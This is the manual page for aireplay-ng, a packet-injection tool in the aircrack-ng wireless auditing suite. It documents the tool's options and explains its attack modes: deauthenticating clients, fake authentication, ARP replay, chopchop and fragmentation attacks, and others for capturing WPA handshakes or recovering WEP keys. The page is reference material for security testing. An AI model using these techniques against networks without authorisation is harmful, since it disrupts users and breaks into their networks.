1AIREPLAY-NG(8)              System Manager's Manual             AIREPLAY-NG(8)
2
3
4

NAME

6       aireplay-ng  - inject packets into a wireless network to generate traf‐
7       fic
8

SYNOPSIS

10       aireplay-ng [options] <replay interface>
11

DESCRIPTION

13       aireplay-ng is used to inject/replay frames.  The primary  function  is
14       to  generate  traffic for the later use in aircrack-ng for cracking the
15       WEP and WPA-PSK keys. There are different attacks which can cause deau‐
16       thentications  for  the  purpose  of capturing WPA handshake data, fake
17       authentications, Interactive packet replay,  hand-crafted  ARP  request
18       injection  and  ARP-request  reinjection.  With the packetforge-ng tool
19       it's possible to create arbitrary frames.
20
21       aireplay-ng supports single-NIC injection/monitor.
22
23       This feature needs driver patching.
24

OPTIONS

26       -H, --help
27              Shows the help screen.
28
29       Filter options:
30
31       -b <bssid>
32              MAC address of access point.
33
34       -d <dmac>
35              MAC address of destination.
36
37       -s <smac>
38              MAC address of source.
39
40       -m <len>
41              Minimum packet length.
42
43       -n <len>
44              Maximum packet length.
45
46       -u <type>
47              Frame control, type field.
48
49       -v <subt>
50              Frame control, subtype field.
51
52       -t <tods>
53              Frame control, "To" DS bit (0 or 1).
54
55       -f <fromds>
56              Frame control, "From" DS bit (0 or 1).
57
58       -w <iswep>
59              Frame control, WEP bit (0 or 1).
60
61       -D     Disable AP Detection.
62
63       Replay options:
64
65       -x <nbpps>
66              Number of packets per second.
67
68       -p <fctrl>
69              Set frame control word (hex).
70
71       -a <bssid>
72              Set Access Point MAC address.
73
74       -c <dmac>
75              Set destination MAC address.
76
77       -h <smac>
78              Set source MAC address.
79
80       -g <nb_packets>
81              Change ring buffer size (default: 8 packets). The minimum is 1.
82
83       -F     Choose first matching packet.
84
85       -e <essid>
86              Fake Authentication attack: Set target  SSID  (see  below).  For
87              SSID  containing  special  characters, see https://www.aircrack-
88              ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_sin‐
89              gle_quote_etc_in_ap_names
90
91       -o <npackets>
92              Fake  Authentication attack: Set the number of packets for every
93              authentication and association attempt  (Default:  1).  0  means
94              auto
95
96       -q <seconds>
97              Fake  Authentication  attack:  Set  the  time between keep-alive
98              packets in fake authentication mode.
99
100       -Q     Fake Authentication attack: Sends reassociation requests instead
101              of  performing  a  complete authentication and association after
102              each delay period.
103
104       -y <prga>
105              Fake Authentication attack: Specifies  the  keystream  file  for
106              fake shared key authentication.
107
108       -T n   Fake  Authentication  attack:  Exit if fake authentication fails
109              'n' time(s).
110
111       -j     ARP Replay attack : inject FromDS packets (see below).
112
113       -k <IP>
114              Fragmentation attack: Set destination IP in fragments.
115
116       -l <IP>
117              Fragmentation attack: Set source IP in fragments.
118
119       -B     Test option: bitrate test.
120
121       Source options:
122
123       -i <iface>
124              Capture packets from this interface.
125
126       -r <file>
127              Extract packets from this pcap file.
128
129       Miscellaneous options:
130
131       -R     disable /dev/rtc usage.
132
133       --ignore-negative-one if the interface's channel  can't  be  determined
134       ignore the mismatch, needed for unpatched cfg80211
135
136       --deauth-rc  <rc>,  -Z <rc> Provide a reason code when doing deauthica‐
137       tion (between 0 and 255). By default, 7 is used: Class 3 frame received
138       from unassociated STA. 0 is a reserved value. Reason codes explanations
139       can  be  found  in  the  IEEE802.11  standard   or   in   https://mrnc
140       ciew.com/2014/10/11/802-11-mgmt-deauth-disassociation-frames/
141
142       Attack modes:
143
144       -0 <count>, --deauth=<count>
145              This  attack  sends  deauthentication  packets  to  one  or more
146              clients which are currently associated with a particular  access
147              point. Deauthenticating clients can be done for a number of rea‐
148              sons: Recovering a hidden ESSID. This is an ESSID which  is  not
149              being broadcast. Another term for this is "cloaked" or Capturing
150              WPA/WPA2 handshakes by forcing clients to reauthenticate or Gen‐
151              erate  ARP  requests  (Windows clients sometimes flush their ARP
152              cache when disconnected).  Of course,  this  attack  is  totally
153              useless  if  there  are no associated wireless client or on fake
154              authentications.
155
156       -1 <delay>, --fakeauth=<delay>
157              The fake authentication attack allows you  to  perform  the  two
158              types  of  WEP  authentication (Open System and Shared Key) plus
159              associate with the access point (AP). This is only  useful  when
160              you  need  an  associated  MAC  address  in  various aireplay-ng
161              attacks and there is currently no associated client.  It  should
162              be  noted  that the fake authentication attack does NOT generate
163              any ARP packets. Fake authentication cannot be used to authenti‐
164              cate/associate with WPA/WPA2 Access Points.
165
166       -2, --interactive
167              This attack allows you to choose a specific packet for replaying
168              (injecting). The attack can obtain packets to  replay  from  two
169              sources.  The first being a live flow of packets from your wire‐
170              less card. The second being from a pcap  file.  Reading  from  a
171              file  is an often overlooked feature of aireplay-ng. This allows
172              you read packets from other capture  sessions  or  quite  often,
173              various attacks generate pcap files for easy reuse. A common use
174              of reading a file containing a packet your created with  packet‐
175              forge-ng.
176
177       -3, --arpreplay
178              The  classic ARP request replay attack is the most effective way
179              to generate new initialization vectors  (IVs),  and  works  very
180              reliably. The program listens for an ARP packet then retransmits
181              it back to the access point. This, in turn,  causes  the  access
182              point  to  repeat  the  ARP  packet  with  a new IV. The program
183              retransmits the same ARP packet over and over. However, each ARP
184              packet  repeated  by  the  access point has a new IVs. It is all
185              these new IVs which allow you to determine the WEP key.
186
187       -4, --chopchop
188              This attack, when successful, can  decrypt  a  WEP  data  packet
189              without  knowing  the key. It can even work against dynamic WEP.
190              This attack does not recover the  WEP  key  itself,  but  merely
191              reveals  the plaintext. However, some access points are not vul‐
192              nerable to this attack. Some may seem vulnerable  at  first  but
193              actually  drop data packets shorter that 60 bytes. If the access
194              point drops packets shorter than 42  bytes,  aireplay  tries  to
195              guess  the  rest  of the missing data, as far as the headers are
196              predictable. If an IP packet is captured, it additionally checks
197              if  the  checksum  of  the  header is correct after guessing the
198              missing parts of it. This attack requires at least one WEP  data
199              packet.
200
201       -5, --fragment
202              This  attack,  when  successful,  can  obtain 1500 bytes of PRGA
203              (pseudo random  generation  algorithm).  This  attack  does  not
204              recover  the  WEP  key  itself, but merely obtains the PRGA. The
205              PRGA can then be used to generate  packets  with  packetforge-ng
206              which  are  in  turn  used  for  various  injection  attacks. It
207              requires at least one data packet to be received from the access
208              point in order to initiate the attack.
209
210       -6, --caffe-latte
211              In general, for an attack to work, the attacker has to be in the
212              range of an AP and a connected  client  (fake  or  real).  Caffe
213              Latte attacks allows one to gather enough packets to crack a WEP
214              key without the need of an AP, it just need a client  to  be  in
215              range.
216
217       -7, --cfrag
218              This  attack  turns  IP  or  ARP  packets from a client into ARP
219              request against the client. This attack  works  especially  well
220              against  ad-hoc  networks. As well it can be used against softAP
221              clients and normal AP clients.
222
223       -8, --migmode
224              This attack works against Cisco Aironet access points configured
225              in WPA Migration Mode, which enables both WPA and WEP clients to
226              associate to an access point using the same Service Set  Identi‐
227              fier  (SSID).  The program listens for a WEP-encapsulated broad‐
228              cast ARP packet, bitflips it to make it into an ARP coming  from
229              the  attacker's  MAC  address  and  retransmits it to the access
230              point. This, in turn, causes the access point to repeat the  ARP
231              packet  with  a  new IV and also to forward the ARP reply to the
232              attacker with a new IV. The program  retransmits  the  same  ARP
233              packet  over  and over. However, each ARP packet repeated by the
234              access point has a new IV as does the ARP reply forwarded to the
235              attacker  by  the  access  point.  It is all these new IVs which
236              allow you to determine the WEP key.
237
238       -9, --test
239              Tests injection and quality.
240

FRAGMENTATION VERSUS CHOPCHOP

242       Fragmentation:
243
244
245              Pros
246              - Can obtain the full packet length  of  1500  bytes  XOR.  This
247              means  you  can  subsequently  pretty  well  create  any size of
248              packet.
249              - May work where chopchop does not
250              - Is extremely fast. It yields the XOR stream extremely  quickly
251              when successful.
252
253
254              Cons
255              -  Setup  to  execute  the  attack is more subject to the device
256              drivers. For example, Atheros  does  not  generate  the  correct
257              packets  unless  the wireless card is set to the mac address you
258              are spoofing.
259              - You need to be physically closer to the access point since  if
260              any packets are lost then the attack fails.
261
262       Chopchop
263
264
265              Pro
266              - May work where frag does not work.
267
268
269              Cons
270              - Cannot be used against every access point.
271              -  The  maximum  XOR bits is limited to the length of the packet
272              you chopchop against.
273              - Much slower then the fragmentation attack.
274

AUTHOR

276       This manual page was written by Adam Cecile  <gandalf@le-vert.net>  for
277       the  Debian  system (but may be used by others).  Permission is granted
278       to copy, distribute and/or modify this document under the terms of  the
279       GNU General Public License, Version 2 or any later version published by
280       the Free Software Foundation On Debian systems, the  complete  text  of
281       the  GNU  General  Public  License  can  be found in /usr/share/common-
282       licenses/GPL.
283

SEE ALSO

285       airbase-ng(8)
286       airmon-ng(8)
287       airodump-ng(8)
288       airodump-ng-oui-update(8)
289       airserv-ng(8)
290       airtun-ng(8)
291       besside-ng(8)
292       easside-ng(8)
293       tkiptun-ng(8)
294       wesside-ng(8)
295       aircrack-ng(1)
296       airdecap-ng(1)
297       airdecloak-ng(1)
298       airolib-ng(1)
299       besside-ng-crawler(1)
300       buddy-ng(1)
301       ivstools(1)
302       kstats(1)
303       makeivs-ng(1)
304       packetforge-ng(1)
305       wpaclean(1)
306       airventriloquist(8)
307
308
309
310Version 1.6.0                    January 2020                   AIREPLAY-NG(8)
Impressum